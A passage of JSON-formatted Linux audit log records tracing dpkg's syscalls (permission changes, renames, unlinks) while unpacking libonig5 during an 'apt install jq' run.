"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.805:480",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x0",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808421,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.805:481",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x1a4",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808421,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.805:482",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "no",
"exit": "-2",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556ebaf26ed0",
"0xfffffffffffffe98",
"0x41ed"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.805:483",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x41ed"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:484",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x41ed"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:485",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 92,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0x556ebaf26f70",
"0x0",
"0x0",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libonig5.dpkg-new",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:486",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0x556ebaf26f70",
"0x1ed",
"0x0",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libonig5.dpkg-new",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:487",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556ebaf26ed0",
"0x41ed",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/",
"inode": 793993,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/usr/share/doc/libonig5.dpkg-new",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/usr/share/doc/libonig5",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:488",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "no",
"exit": "-2",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556ebaf26ed0",
"0xfffffffffffffe98",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libonig5/",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/libonig5/",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:489",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libonig5/",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:490",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libonig5/",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:491",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x0",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808423,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:492",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x1a4",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808423,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:493",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "no",
"exit": "-2",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556ebaf26ed0",
"0xfffffffffffffe98",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libonig5/",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/libonig5/",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:494",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libonig5/",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:495",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libonig5/",
"inode": 808422,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:496",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x0",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808424,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:497",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x1a4",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808424,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:498",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "no",
"exit": "-2",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556ebaf26ed0",
"0xfffffffffffffe98",
"0xa1ff"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:499",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0xa1ff"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:500",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0xa1ff"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.809:501",
